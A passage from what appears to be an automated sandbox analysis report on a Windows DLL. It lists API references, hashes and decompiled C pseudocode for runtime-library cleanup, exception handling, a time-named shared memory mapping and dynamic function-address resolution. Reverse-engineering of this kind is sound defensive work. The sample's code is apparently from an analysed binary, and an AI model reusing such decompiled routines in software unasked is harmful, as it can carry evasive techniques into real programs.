                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bebc977af7d34d5d22399dccb5525bf99a1a508f202cdd2d67311cd910c47a08
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E08C3391162CEBCB18CBC8C900E8AB3EDFB45E40B1148A6B511D3110D370EE40C7D0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6E24297E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456CE
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456E0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2456F2
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245704
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245716
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245728
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24573A
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24574C
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E24575E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245770
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245782
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E245794
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2456B1: _free.LIBCMT ref: 6E2457A6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242973
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242995
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429AA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429B5
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429EA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2429F8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A03
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A3B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A42
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A5F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E242A77
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction ID: a63bd5db076cb06e5093edef45ccf21baba3bcc49aedbfc37e97efda839b46bd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44816209776e4e40cd017dc98265cd90fc3f4c90bc5874762c8ced33a29f924
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E3190B260031ADFEB648BB6DC40B8673EABF00355F314D19E869D7154DB31E8408F14
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2395CB
                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6E2395F2
                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6E2396FE
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239753
                                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2397D9
                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6E239860
                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6E23987B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                    • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                                    • Opcode ID: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction ID: c30f1c125f4d8d96e09fbba9d648f03eba2003405368d434e649a846f3ba32d9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3C17AB5C0422EAFCF15CFE4C88099EBB7ABF46315F20455AE8116B249DB31DA61CF91
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D27E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D28A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D295
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2A0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2AB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2B6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2C1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2CC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2E5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction ID: 97eae551447f59d9f4220a35069cb2041860641c9e00c284b1040b41b4561110
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 052187BA94011CAFCF41DFE4D890DDD7BBAFF08244B218566E9199B121DB31DA55CF80
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: eb3f792113da4b625d71f0996c5c339be9891be0eadc50e9f165b8d2b0e1b004
                                                                                                                                                                                                                                                                    • Instruction ID: 19ec7bd6c306872e3df39dc9319bac30a882b955fdce2cc641e6d8f66d2fe56b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb3f792113da4b625d71f0996c5c339be9891be0eadc50e9f165b8d2b0e1b004
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EC1BFB490421EDFDB09CFE8C894FADBBB6BF99304F104459E4159B281E7709981CF62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                    			E6E1F1979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                                                                                                    				L6E1F2210();
                                                                                                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                                                                                                    				_t15 =  *0x6e1f41d0;
                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e1f505e);
                                                                                                                                                                                                                                                                    				_push(_t15 + 0x6e1f5054);
                                                                                                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                                                                                                    				L6E1F220A();
                                                                                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				_t34 = CreateFileMappingW(0xffffffff, 0x6e1f41c0, 4, 0, _t18,  &_v60);
                                                                                                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                    0x6e1f1979
                                                                                                                                                                                                                                                                    0x6e1f1982
                                                                                                                                                                                                                                                                    0x6e1f1986
                                                                                                                                                                                                                                                                    0x6e1f198c
                                                                                                                                                                                                                                                                    0x6e1f1991
                                                                                                                                                                                                                                                                    0x6e1f1996
                                                                                                                                                                                                                                                                    0x6e1f1999
                                                                                                                                                                                                                                                                    0x6e1f199c
                                                                                                                                                                                                                                                                    0x6e1f19a1
                                                                                                                                                                                                                                                                    0x6e1f19a2
                                                                                                                                                                                                                                                                    0x6e1f19a5
                                                                                                                                                                                                                                                                    0x6e1f19b0
                                                                                                                                                                                                                                                                    0x6e1f19b7
                                                                                                                                                                                                                                                                    0x6e1f19bb
                                                                                                                                                                                                                                                                    0x6e1f19bd
                                                                                                                                                                                                                                                                    0x6e1f19be
                                                                                                                                                                                                                                                                    0x6e1f19c1
                                                                                                                                                                                                                                                                    0x6e1f19c6
                                                                                                                                                                                                                                                                    0x6e1f19d0
                                                                                                                                                                                                                                                                    0x6e1f19d2
                                                                                                                                                                                                                                                                    0x6e1f19d2
                                                                                                                                                                                                                                                                    0x6e1f19ec
                                                                                                                                                                                                                                                                    0x6e1f19f0
                                                                                                                                                                                                                                                                    0x6e1f1a40
                                                                                                                                                                                                                                                                    0x6e1f19f2
                                                                                                                                                                                                                                                                    0x6e1f19fb
                                                                                                                                                                                                                                                                    0x6e1f1a11
                                                                                                                                                                                                                                                                    0x6e1f1a19
                                                                                                                                                                                                                                                                    0x6e1f1a2b
                                                                                                                                                                                                                                                                    0x6e1f1a2f
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1a1b
                                                                                                                                                                                                                                                                    0x6e1f1a1e
                                                                                                                                                                                                                                                                    0x6e1f1a23
                                                                                                                                                                                                                                                                    0x6e1f1a25
                                                                                                                                                                                                                                                                    0x6e1f1a25
                                                                                                                                                                                                                                                                    0x6e1f1a06
                                                                                                                                                                                                                                                                    0x6e1f1a08
                                                                                                                                                                                                                                                                    0x6e1f1a31
                                                                                                                                                                                                                                                                    0x6e1f1a32
                                                                                                                                                                                                                                                                    0x6e1f1a32
                                                                                                                                                                                                                                                                    0x6e1f19fb
                                                                                                                                                                                                                                                                    0x6e1f1a48

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?,?), ref: 6E1F1986
                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1F199C
                                                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 6E1F19C1
                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,6E1F41C0,00000004,00000000,?,?), ref: 6E1F19E6
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?), ref: 6E1F19FD
                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E1F1A11
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?), ref: 6E1F1A29
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A), ref: 6E1F1A32
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1F176E,0000000A,?), ref: 6E1F1A3A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605070540.000000006E1F1000.00000020.00020000.sdmp, Offset: 6E1F0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605056165.000000006E1F0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605084485.000000006E1F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605091636.000000006E1F5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.605100957.000000006E1F6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1724014008-0
                                                                                                                                                                                                                                                                    • Opcode ID: 68f89030acfe3fb8c27aa376681359d5de45a3bc397ed62f39a972bf656250aa
                                                                                                                                                                                                                                                                    • Instruction ID: 1bfc2ea3b24f93cbbc2af52589c79e5bc9c2e309edfcca72fa47b8207165f42e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68f89030acfe3fb8c27aa376681359d5de45a3bc397ed62f39a972bf656250aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5621C1B2600148FFDB00AFD8DC88E9E37ECEB45354F218026F616E7141D6705886ABE1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E245818: _free.LIBCMT ref: 6E24583D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24589E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458A9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458B4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245908
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245913
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24591E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245929
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction ID: e200c28aa309deb199ffb0a7d1aae8d8150d25cca04757747193a0a81902d3e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0116DB5590B0CEBE725A7F0DC06FCB779EAF00704F508C14A6EE66050DB65A5454F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E243593
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E243772
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E24378F
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,6E23F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2437D7
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E243817
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2438C3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.605127247.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4031098158-0
                                                                                                                                                                                                                                                                    • Opcode ID: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction ID: 0d1e64fe4c333ceb160657491c870788f40800a22dbcda45e6c6c0ff1a012c30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D187B5D0025EDFCF19CFE8C8849EDFBB6BF49314F24016AE855AB241D630AA46CB50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                    			E6E1F1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t33;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t36;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t39;
                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t42;
                                                                                                                                                                                                                                                                    				intOrPtr _t46;
                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t50;
                                                                                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                    				_t56 = E6E1F1C8F(0x20);
                                                                                                                                                                                                                                                                    				if(_t56 == 0) {
                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                    					_t50 = GetModuleHandleA( *0x6e1f41d0 + 0x6e1f5014);
                                                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                                                    					_t29 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f50e1);
                                                                                                                                                                                                                                                                    					 *(_t56 + 0xc) = _t29;
                                                                                                                                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                    						E6E1F136A(_t56);
                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                    						_t33 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f50f1);
                                                                                                                                                                                                                                                                    						 *(_t56 + 0x10) = _t33;
                                                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                    							_t36 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f5104);
                                                                                                                                                                                                                                                                    							 *(_t56 + 0x14) = _t36;
                                                                                                                                                                                                                                                                    							if(_t36 == 0) {
                                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                    								_t39 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f5119);
                                                                                                                                                                                                                                                                    								 *(_t56 + 0x18) = _t39;
                                                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                    									_t42 = GetProcAddress(_t50,  *0x6e1f41d0 + 0x6e1f512f);
                                                                                                                                                                                                                                                                    									 *(_t56 + 0x1c) = _t42;
                                                                                                                                                                                                                                                                    									if(_t42 == 0) {
                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                                                                                                                                                    										_t46 = E6E1F18D1(_t56, _a12);
                                                                                                                                                                                                                                                                    										_v8 = _t46;
                                                                                                                                                                                                                                                                    										if(_t46 != 0) {
                                                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                    											 *_a16 = _t56;
                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                    0x6e1f1ab3
                                                                                                                                                                                                                                                                    0x6e1f1ab7
                                                                                                                                                                                                                                                                    0x6e1f1b78
                                                                                                                                                                                                                                                                    0x6e1f1abd
                                                                                                                                                                                                                                                                    0x6e1f1ad5
                                                                                                                                                                                                                                                                    0x6e1f1ae4
                                                                                                                                                                                                                                                                    0x6e1f1aeb
                                                                                                                                                                                                                                                                    0x6e1f1aef
                                                                                                                                                                                                                                                                    0x6e1f1af2
                                                                                                                                                                                                                                                                    0x6e1f1b70
                                                                                                                                                                                                                                                                    0x6e1f1b71
                                                                                                                                                                                                                                                                    0x6e1f1af4
                                                                                                                                                                                                                                                                    0x6e1f1b01
                                                                                                                                                                                                                                                                    0x6e1f1b05
                                                                                                                                                                                                                                                                    0x6e1f1b08
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b0a
                                                                                                                                                                                                                                                                    0x6e1f1b17
                                                                                                                                                                                                                                                                    0x6e1f1b1b
                                                                                                                                                                                                                                                                    0x6e1f1b1e
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b20
                                                                                                                                                                                                                                                                    0x6e1f1b2d
                                                                                                                                                                                                                                                                    0x6e1f1b31
                                                                                                                                                                                                                                                                    0x6e1f1b34
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b36
                                                                                                                                                                                                                                                                    0x6e1f1b43
                                                                                                                                                                                                                                                                    0x6e1f1b47
                                                                                                                                                                                                                                                                    0x6e1f1b4a
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b4c
                                                                                                                                                                                                                                                                    0x6e1f1b52
                                                                                                                                                                                                                                                                    0x6e1f1b58
                                                                                                                                                                                                                                                                    0x6e1f1b5d
                                                                                                                                                                                                                                                                    0x6e1f1b64
                                                                                                                                                                                                                                                                    0x6e1f1b67
                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                    0x6e1f1b69
                                                                                                                                                                                                                                                                    0x6e1f1b6c
                                                                                                                                                                                                                                                                    0x6e1f1b6c
                                                                                                                                                                                                                                                                    0x6e1f1b67
                                                                                                                                                                                                                                                                    0x6e1f1b4a
                                                                                                                                                                                                                                                                    0x6e1f1b34
                                                                                                                                                                                                                                                                    0x6e1f1b1e
                                                                                                                                                                                                                                                                    0x6e1f1b08
                                                                                                                                                                                                                                                                    0x6e1f1af2
                                                                                                                                                                                                                                                                    0x6e1f1b86

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E1F1C8F: HeapAlloc.KERNEL32(00000000,?,6E1F117D,?,00000000,00000000,?,?,?,6E1F1810), ref: 6E1F1C9B
                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1F1272,?,?,?,?), ref: 6E1F1AC9
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1AEB
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B01
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B17
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 6E1F1B2D
